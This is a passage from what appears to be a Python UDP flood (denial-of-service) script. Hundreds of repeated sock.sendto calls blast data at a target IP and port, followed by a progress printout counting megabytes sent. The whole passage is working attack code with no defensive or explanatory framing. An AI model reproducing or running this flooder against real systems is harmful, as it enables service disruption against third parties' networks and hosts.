         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))


     


     
     
    

     print("││ ID:%s  │  Sent %sMB to %s port:%s"%(str((id)).zfill(4),c,ipp,open))
     id+=1
     if id%100==0 or id>100 and id%1000==0:
         nx=len(("││ ID:%s  │  Sent %sMB to %s port:%s"%(str((id)).zfill(4),c,ipp,open)))
         print("―"*nx)
         
